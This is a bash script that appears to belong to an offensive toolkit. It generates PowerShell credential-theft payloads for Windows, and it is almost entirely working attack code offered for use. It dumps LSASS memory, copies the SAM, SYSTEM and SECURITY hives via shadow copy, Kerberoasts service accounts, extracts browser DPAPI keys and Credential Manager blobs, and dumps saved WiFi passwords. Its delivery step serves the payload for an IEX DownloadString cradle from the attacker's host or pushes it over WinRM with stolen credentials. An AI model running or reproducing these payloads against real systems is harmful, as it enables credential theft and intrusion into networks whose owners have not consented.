#!/bin/bash
# Windows Credential Access Payload Generator — 5 Techniques
# Generates PowerShell (.ps1) payloads for credential harvesting with optional WinRM delivery

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'

PAYLOAD_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)/payloads"
mkdir -p "$PAYLOAD_DIR" 2>/dev/null

banner_wincred() {
    echo -e "${RED}"
    echo "  ╔═══════════════════════════════════════════════╗"
    echo "  ║   Windows Credential Access Generator          ║"
    echo "  ║   5 MITRE ATT&CK Techniques — PowerShell      ║"
    echo "  ╚═══════════════════════════════════════════════╝"
    echo -e "${NC}"
}

_winrm_deliver() {
    local PS1_FILE="$1"
    local BASENAME
    BASENAME=$(basename "$PS1_FILE")
    echo ""
    echo -e "${YELLOW}═══ Delivery Options ═══${NC}"
    echo -e "  ${CYAN}[1]${NC} Manual transfer"
    echo -e "  ${CYAN}[2]${NC} Python HTTP + download cradle"
    echo -e "  ${CYAN}[3]${NC} Evil-WinRM upload"
    echo -e "  ${CYAN}[4]${NC} WinRM Invoke-Command"
    echo -e "  ${CYAN}[5]${NC} Skip"
    read -p "  Delivery [5]: " DEL; DEL="${DEL:-5}"
    case "$DEL" in
        1) echo -e "${GREEN}[+] Payload: ${PS1_FILE}${NC}"; echo -e "${YELLOW}[*] Run: powershell -ep bypass -f ${BASENAME}${NC}" ;;
        2)
            local LHOST; LHOST=$(ip -4 addr show scope global | awk '/inet /{print $2}' | cut -d/ -f1 | head -1)
            read -p "  IP [${LHOST}]: " IP; IP="${IP:-$LHOST}"
            read -p "  Port [8443]: " PORT; PORT="${PORT:-8443}"
            echo -e "${YELLOW}[*] Server: cd ${PAYLOAD_DIR} && python3 -m http.server ${PORT}${NC}"
            echo -e "${YELLOW}[*] Target: IEX(New-Object Net.WebClient).DownloadString('http://${IP}:${PORT}/${BASENAME}')${NC}"
            read -p "  Start server? [y/N]: " yn
            [[ "$yn" =~ ^[Yy] ]] && { cd "$PAYLOAD_DIR" && python3 -m http.server "$PORT" & disown; echo -e "${GREEN}[+] Serving on :${PORT}${NC}"; }
            ;;
        3)
            read -p "  Target IP: " TGT; read -p "  User: " TU; read -p "  Pass: " -s TP; echo ""
            echo -e "${YELLOW}[*] evil-winrm -i ${TGT} -u '${TU}' -p '***' then: upload ${PS1_FILE}${NC}"
            ;;
        4)
            read -p "  Target IP: " TGT; read -p "  User: " TU; read -p "  Pass: " -s TP; echo ""
            local RE="${PAYLOAD_DIR}/winrm_exec.ps1"
            local SC; SC=$(cat "$PS1_FILE")
            cat > "$RE" << PSEOF
\$p = ConvertTo-SecureString '${TP}' -AsPlainText -Force
\$c = New-Object System.Management.Automation.PSCredential('${TU}', \$p)
Invoke-Command -ComputerName '${TGT}' -Credential \$c -ScriptBlock { ${SC} }
PSEOF
            echo -e "${GREEN}[+] WinRM exec script: ${RE}${NC}"
            ;;
        5) echo -e "${GREEN}[+] Saved: ${PS1_FILE}${NC}" ;;
    esac
}

# ──────────────────────────────────────────────
# 1. T1003.001 — LSASS Memory Dump
# ──────────────────────────────────────────────
gen_lsass() {
    echo -e "${CYAN}[*] T1003.001 — LSASS Memory Dump (Admin/SYSTEM Required)${NC}"

    echo -e "  Dump method:"
    echo -e "  ${CYAN}[1]${NC} comsvcs.dll MiniDump (signed Windows DLL)"
    echo -e "  ${CYAN}[2]${NC} P/Invoke MiniDumpWriteDump"
    echo -e "  ${CYAN}[3]${NC} Task Manager (manual instruction)"
    echo -e "  ${CYAN}[4]${NC} ALL methods in one script"
    read -p "  Method [4]: " LM; LM="${LM:-4}"

    read -p "  Output path [C:\\Users\\Public\\debug.dmp]: " DPATH
    DPATH="${DPATH:-C:\\Users\\Public\\debug.dmp}"

    local OUTFILE="${PAYLOAD_DIR}/win_lsass_dump.ps1"
    cat > "$OUTFILE" << PSEOF
# T1003.001 — LSASS Memory Dump
# Generated by D3m0n1z3dShell
# Requires: Administrator/SYSTEM + SeDebugPrivilege

\$dumpPath = "${DPATH}"
PSEOF

    if [[ "$LM" == "1" || "$LM" == "4" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Method 1: comsvcs.dll MiniDump (uses a signed Windows DLL — stealthy)
Write-Host "[*] Method 1: comsvcs.dll MiniDump..." -ForegroundColor Yellow
try {
    $lsass = Get-Process -Name "lsass" -ErrorAction Stop
    $dumpFile = $dumpPath
    # Must run from a SYSTEM context or with SeDebugPrivilege
    rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $($lsass.Id) $dumpFile full
    if (Test-Path $dumpFile) {
        $size = (Get-Item $dumpFile).Length / 1MB
        Write-Host "[+] LSASS dump: $dumpFile ($([math]::Round($size,2)) MB)" -ForegroundColor Green
    } else {
        Write-Host "[-] Dump file not created (may need SYSTEM context)" -ForegroundColor Red
    }
} catch {
    Write-Host "[-] comsvcs.dll method failed: $_" -ForegroundColor Red
}
PSEOF
    fi

    if [[ "$LM" == "2" || "$LM" == "4" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Method 2: P/Invoke MiniDumpWriteDump
Write-Host "[*] Method 2: P/Invoke MiniDumpWriteDump..." -ForegroundColor Yellow
try {
    $miniDump = Add-Type -MemberDefinition @"
[DllImport("dbghelp.dll", SetLastError = true)]
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, uint DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr handle);
"@ -Name "DbgHelp" -Namespace "D3m0n_Cred" -PassThru

    $lsass = Get-Process -Name "lsass"
    $hProc = $miniDump::OpenProcess(0x1F0FFF, $false, $lsass.Id)

    $dumpFile2 = $dumpPath -replace '\.dmp$', '_pinvoke.dmp'
    $fs = [IO.File]::Create($dumpFile2)
    # MiniDumpWithFullMemory = 0x00000002
    $result = $miniDump::MiniDumpWriteDump($hProc, [uint32]$lsass.Id, $fs.SafeFileHandle.DangerousGetHandle(), [uint32]2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
    $fs.Close()
    $miniDump::CloseHandle($hProc) | Out-Null

    if ($result -and (Test-Path $dumpFile2)) {
        $size = (Get-Item $dumpFile2).Length / 1MB
        Write-Host "[+] LSASS dump: $dumpFile2 ($([math]::Round($size,2)) MB)" -ForegroundColor Green
    } else {
        Write-Host "[-] MiniDumpWriteDump failed" -ForegroundColor Red
    }
} catch {
    Write-Host "[-] P/Invoke method failed: $_" -ForegroundColor Red
}
PSEOF
    fi

    if [[ "$LM" == "3" || "$LM" == "4" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Method 3: Manual instructions
Write-Host "`n[*] Method 3: Manual (Task Manager)" -ForegroundColor Yellow
Write-Host "    1. Open Task Manager as Administrator" -ForegroundColor White
Write-Host "    2. Go to 'Details' tab" -ForegroundColor White
Write-Host "    3. Right-click 'lsass.exe' -> 'Create dump file'" -ForegroundColor White
Write-Host "    4. Dump saved to: %TEMP%\lsass.DMP" -ForegroundColor White
Write-Host "    5. Transfer and parse with: pypykatz lsa minidump lsass.DMP" -ForegroundColor White
PSEOF
    fi

    cat >> "$OUTFILE" << 'PSEOF'

Write-Host "`n[*] Parse dump on Kali:" -ForegroundColor Yellow
Write-Host "    pypykatz lsa minidump <dumpfile>" -ForegroundColor White
Write-Host "    mimikatz # sekurlsa::minidump <dumpfile>" -ForegroundColor White
Write-Host "    mimikatz # sekurlsa::logonPasswords" -ForegroundColor White
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 2. T1003.002 — SAM/SYSTEM/SECURITY Extraction
# ──────────────────────────────────────────────
gen_sam() {
    echo -e "${CYAN}[*] T1003.002 — SAM/SYSTEM/SECURITY Hive Extraction (Admin Required)${NC}"

    read -p "  Output directory [C:\\Users\\Public]: " ODIR; ODIR="${ODIR:-C:\\Users\\Public}"

    echo -e "  Method:"
    echo -e "  ${CYAN}[1]${NC} reg save (direct — may be blocked by AV)"
    echo -e "  ${CYAN}[2]${NC} Volume Shadow Copy (stealthier)"
    echo -e "  ${CYAN}[3]${NC} Both methods"
    read -p "  Method [3]: " SM; SM="${SM:-3}"

    local OUTFILE="${PAYLOAD_DIR}/win_sam_dump.ps1"
    cat > "$OUTFILE" << PSEOF
# T1003.002 — SAM/SYSTEM/SECURITY Hive Extraction
# Generated by D3m0n1z3dShell
# Requires: Administrator

\$outDir = "${ODIR}"
New-Item -ItemType Directory -Path \$outDir -Force -ErrorAction SilentlyContinue | Out-Null
PSEOF

    if [[ "$SM" == "1" || "$SM" == "3" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Method 1: reg save
Write-Host "[*] Method 1: reg save..." -ForegroundColor Yellow
try {
    reg save HKLM\SAM "$outDir\sam.bak" /y 2>$null
    reg save HKLM\SYSTEM "$outDir\system.bak" /y 2>$null
    reg save HKLM\SECURITY "$outDir\security.bak" /y 2>$null

    foreach ($f in @("sam.bak","system.bak","security.bak")) {
        $path = Join-Path $outDir $f
        if (Test-Path $path) {
            Write-Host "  [+] $f — $((Get-Item $path).Length / 1KB) KB" -ForegroundColor Green
        } else {
            Write-Host "  [-] $f — FAILED" -ForegroundColor Red
        }
    }
} catch {
    Write-Host "[-] reg save failed: $_" -ForegroundColor Red
}
PSEOF
    fi

    if [[ "$SM" == "2" || "$SM" == "3" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Method 2: Volume Shadow Copy
Write-Host "`n[*] Method 2: Volume Shadow Copy..." -ForegroundColor Yellow
try {
    # Create shadow copy
    $shadow = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
    $shadowID = $shadow.ShadowID
    $shadowPath = (Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $shadowID }).DeviceObject

    if ($shadowPath) {
        # Create symlink to access shadow
        cmd /c "mklink /d C:\shadowcopy $shadowPath\" 2>$null

        Copy-Item "C:\shadowcopy\Windows\System32\config\SAM" "$outDir\sam_vss.bak" -Force
        Copy-Item "C:\shadowcopy\Windows\System32\config\SYSTEM" "$outDir\system_vss.bak" -Force
        Copy-Item "C:\shadowcopy\Windows\System32\config\SECURITY" "$outDir\security_vss.bak" -Force

        # Cleanup
        cmd /c "rmdir C:\shadowcopy" 2>$null
        (Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $shadowID }).Delete()

        foreach ($f in @("sam_vss.bak","system_vss.bak","security_vss.bak")) {
            $path = Join-Path $outDir $f
            if (Test-Path $path) {
                Write-Host "  [+] $f — $((Get-Item $path).Length / 1KB) KB" -ForegroundColor Green
            }
        }
    }
} catch {
    Write-Host "[-] VSS method failed: $_" -ForegroundColor Red
}
PSEOF
    fi

    cat >> "$OUTFILE" << 'PSEOF'

Write-Host "`n[*] Parse on Kali:" -ForegroundColor Yellow
Write-Host "    secretsdump.py -sam sam.bak -system system.bak -security security.bak LOCAL" -ForegroundColor White
Write-Host "    pypykatz registry --sam sam.bak --system system.bak --security security.bak" -ForegroundColor White
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 3. T1558.003 — Kerberoasting
# ──────────────────────────────────────────────
gen_kerberoast() {
    echo -e "${CYAN}[*] T1558.003 — Kerberoasting (Domain User Required)${NC}"

    local OUTFILE="${PAYLOAD_DIR}/win_kerberoast.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1558.003 — Kerberoasting
# Generated by D3m0n1z3dShell
# Requires: Domain user credentials (no admin needed)

Write-Host "[*] Kerberoasting — Requesting TGS tickets for SPN accounts..." -ForegroundColor Yellow

# Step 1: Enumerate SPN accounts
try {
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Domain)

    # LDAP search for user accounts with SPNs
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter = "(&(objectCategory=user)(servicePrincipalName=*)(!(cn=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
    $searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname","description","memberof"))

    $results = $searcher.FindAll()
    Write-Host "[+] Found $($results.Count) accounts with SPNs" -ForegroundColor Green

    $hashes = @()

    foreach ($result in $results) {
        $username = $result.Properties["samaccountname"][0]
        $spns = $result.Properties["serviceprincipalname"]
        $desc = $result.Properties["description"]

        Write-Host "  [*] $username" -ForegroundColor Cyan
        foreach ($spn in $spns) {
            Write-Host "      SPN: $spn" -ForegroundColor White

            # Request TGS ticket
            try {
                Add-Type -AssemblyName System.IdentityModel
                $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
                $ticketBytes = $ticket.GetRequest()

                # Extract and format for hashcat
                if ($ticketBytes) {
                    $hex = [BitConverter]::ToString($ticketBytes) -replace '-'
                    # Find the encrypted part (RC4 = etype 23)
                    $hashcatFormat = "`$krb5tgs`$23`$*$username`$$($env:USERDNSDOMAIN)`$$spn*`$$hex"
                    $hashes += $hashcatFormat
                    Write-Host "      [+] TGS ticket obtained" -ForegroundColor Green
                }
            } catch {
                Write-Host "      [-] Failed: $_" -ForegroundColor Red
            }
        }
    }

    # Output hashes
    if ($hashes.Count -gt 0) {
        $outFile = "$env:TEMP\kerberoast_hashes.txt"
        $hashes | Out-File -FilePath $outFile -Encoding ASCII
        Write-Host "`n[+] $($hashes.Count) hashes saved to: $outFile" -ForegroundColor Green
        Write-Host "[*] Crack with:" -ForegroundColor Yellow
        Write-Host "    hashcat -m 13100 kerberoast_hashes.txt wordlist.txt" -ForegroundColor White
        Write-Host "    john --format=krb5tgs kerberoast_hashes.txt --wordlist=wordlist.txt" -ForegroundColor White
    }
} catch {
    Write-Host "[-] Kerberoasting failed: $_" -ForegroundColor Red
    Write-Host "[*] Ensure you're running as a domain user on a domain-joined machine" -ForegroundColor Yellow
}
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 4. T1555.004 — DPAPI Secret Extraction
# ──────────────────────────────────────────────
gen_dpapi() {
    echo -e "${CYAN}[*] T1555.004 — DPAPI Secret Extraction${NC}"

    echo -e "  Target:"
    echo -e "  ${CYAN}[1]${NC} Chrome/Edge saved passwords"
    echo -e "  ${CYAN}[2]${NC} Windows Credential Manager"
    echo -e "  ${CYAN}[3]${NC} Both"
    read -p "  Target [3]: " DT; DT="${DT:-3}"

    local OUTFILE="${PAYLOAD_DIR}/win_dpapi.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1555.004 — DPAPI Secret Extraction
# Generated by D3m0n1z3dShell
PSEOF

    if [[ "$DT" == "1" || "$DT" == "3" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Chrome / Edge Saved Passwords
Write-Host "[*] Extracting Chrome/Edge saved passwords..." -ForegroundColor Yellow

function Get-ChromePasswords {
    param([string]$Browser = "Chrome")

    $dbPaths = @{
        "Chrome" = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
        "Edge"   = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
    }

    $localStatePaths = @{
        "Chrome" = "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State"
        "Edge"   = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State"
    }

    $dbPath = $dbPaths[$Browser]
    $localStatePath = $localStatePaths[$Browser]

    if (-not (Test-Path $dbPath)) {
        Write-Host "  [-] $Browser database not found" -ForegroundColor Red
        return
    }

    # Copy DB to temp (it's locked while browser runs)
    $tempDb = "$env:TEMP\login_data_$Browser.db"
    Copy-Item $dbPath $tempDb -Force

    # For newer Chrome (v80+), passwords are AES-GCM encrypted with key from Local State
    if (Test-Path $localStatePath) {
        $localState = Get-Content $localStatePath -Raw | ConvertFrom-Json
        $encKey = [Convert]::FromBase64String($localState.os_crypt.encrypted_key)
        # Remove "DPAPI" prefix (5 bytes)
        $encKey = $encKey[5..($encKey.Length - 1)]
        # Decrypt with DPAPI
        Add-Type -AssemblyName System.Security
        $decKey = [System.Security.Cryptography.ProtectedData]::Unprotect($encKey, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        Write-Host "  [+] $Browser AES key extracted ($($decKey.Length) bytes)" -ForegroundColor Green
    }

    # Read SQLite database (requires sqlite interop or manual parsing)
    # Simple approach: use System.Data.SQLite if available, else output raw
    Write-Host "  [*] Login database copied to: $tempDb" -ForegroundColor Yellow
    Write-Host "  [*] Parse on Kali: python3 -c 'import sqlite3; ...' or use: chainbreaker" -ForegroundColor Yellow
    Write-Host "  [*] Or: pypykatz dpapi chrome --file $tempDb" -ForegroundColor Yellow
}

Get-ChromePasswords -Browser "Chrome"
Get-ChromePasswords -Browser "Edge"
PSEOF
    fi

    if [[ "$DT" == "2" || "$DT" == "3" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Windows Credential Manager
Write-Host "`n[*] Extracting Windows Credential Manager..." -ForegroundColor Yellow

# Generic credentials
Write-Host "  [*] Generic Credentials:" -ForegroundColor Cyan
cmdkey /list 2>$null | ForEach-Object { Write-Host "    $_" }

# Vault enumeration
Write-Host "`n  [*] Credential Vault:" -ForegroundColor Cyan
$vaultPaths = Get-ChildItem "$env:APPDATA\Microsoft\Credentials" -ErrorAction SilentlyContinue
foreach ($vp in $vaultPaths) {
    Write-Host "    Credential blob: $($vp.FullName) ($($vp.Length) bytes)" -ForegroundColor White
}

# DPAPI master keys location
$mkPath = "$env:APPDATA\Microsoft\Protect\*"
$sids = Get-ChildItem $mkPath -ErrorAction SilentlyContinue
foreach ($sid in $sids) {
    $keys = Get-ChildItem $sid.FullName -ErrorAction SilentlyContinue
    Write-Host "  [*] DPAPI Master Keys ($($sid.Name)):" -ForegroundColor Cyan
    foreach ($k in $keys) {
        Write-Host "    $($k.Name) — $($k.Length) bytes" -ForegroundColor White
    }
}

Write-Host "`n[*] Parse on Kali:" -ForegroundColor Yellow
Write-Host "    mimikatz # dpapi::cred /in:<credential_blob>" -ForegroundColor White
Write-Host "    mimikatz # dpapi::masterkey /in:<masterkey> /rpc" -ForegroundColor White
Write-Host "    pypykatz dpapi prekey password <SID> <password>" -ForegroundColor White
PSEOF
    fi

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 5. T1552.001 — WiFi Password Extraction
# ──────────────────────────────────────────────
gen_wifi() {
    echo -e "${CYAN}[*] T1552.001 — WiFi Password Extraction (Admin Required)${NC}"

    local OUTFILE="${PAYLOAD_DIR}/win_wifi_dump.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1552.001 — WiFi Password Extraction
# Generated by D3m0n1z3dShell
# Requires: Administrator (for key=clear)

Write-Host "[*] Extracting saved WiFi passwords..." -ForegroundColor Yellow
Write-Host ""

$profiles = netsh wlan show profiles 2>$null | Select-String "All User Profile" | ForEach-Object {
    ($_ -split ":")[-1].Trim()
}

if ($profiles.Count -eq 0) {
    Write-Host "[-] No WiFi profiles found" -ForegroundColor Red
    exit 1
}

$results = @()
foreach ($profile in $profiles) {
    $detail = netsh wlan show profile name="$profile" key=clear 2>$null
    $password = ($detail | Select-String "Key Content" | ForEach-Object { ($_ -split ":")[-1].Trim() })
    $auth = ($detail | Select-String "Authentication" | Select-Object -First 1 | ForEach-Object { ($_ -split ":")[-1].Trim() })
    $cipher = ($detail | Select-String "Cipher" | Select-Object -First 1 | ForEach-Object { ($_ -split ":")[-1].Trim() })

    $obj = [PSCustomObject]@{
        SSID = $profile
        Auth = $auth
        Cipher = $cipher
        Password = if ($password) { $password } else { "(open/enterprise)" }
    }
    $results += $obj

    if ($password) {
        Write-Host "  [+] $profile : $password  ($auth/$cipher)" -ForegroundColor Green
    } else {
        Write-Host "  [-] $profile : (no cleartext key)  ($auth)" -ForegroundColor Yellow
    }
}

# Export to file
$outFile = "$env:TEMP\wifi_passwords.txt"
$results | Format-Table -AutoSize | Out-String | Set-Content $outFile
Write-Host "`n[+] Results saved to: $outFile" -ForegroundColor Green
Write-Host "[+] Found $($results.Count) profiles, $(@($results | Where-Object { $_.Password -ne '(open/enterprise)' }).Count) with passwords" -ForegroundColor Green

# Also export XML profiles (contain PSK in some cases)
$xmlDir = "$env:TEMP\wifi_xml"
New-Item -ItemType Directory -Path $xmlDir -Force | Out-Null
netsh wlan export profile folder="$xmlDir" key=clear 2>$null | Out-Null
Write-Host "[+] XML profiles exported to: $xmlDir" -ForegroundColor Green
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# Main Menu
# ──────────────────────────────────────────────
main() {
    banner_wincred

    echo -e "  ${CYAN}[1]${NC} LSASS Memory Dump (T1003.001) ${RED}★ High Value${NC}"
    echo -e "  ${CYAN}[2]${NC} SAM/SYSTEM/SECURITY Extraction (T1003.002)"
    echo -e "  ${CYAN}[3]${NC} Kerberoasting (T1558.003)"
    echo -e "  ${CYAN}[4]${NC} DPAPI Secrets — Chrome/Edge/CredMgr (T1555.004)"
    echo -e "  ${CYAN}[5]${NC} WiFi Password Extraction (T1552.001)"
    echo ""
    read -p "Choose [1-5]: " OPT

    case "$OPT" in
        1) gen_lsass ;;
        2) gen_sam ;;
        3) gen_kerberoast ;;
        4) gen_dpapi ;;
        5) gen_wifi ;;
        *) echo -e "${RED}[!] Invalid option${NC}" ;;
    esac
}

main
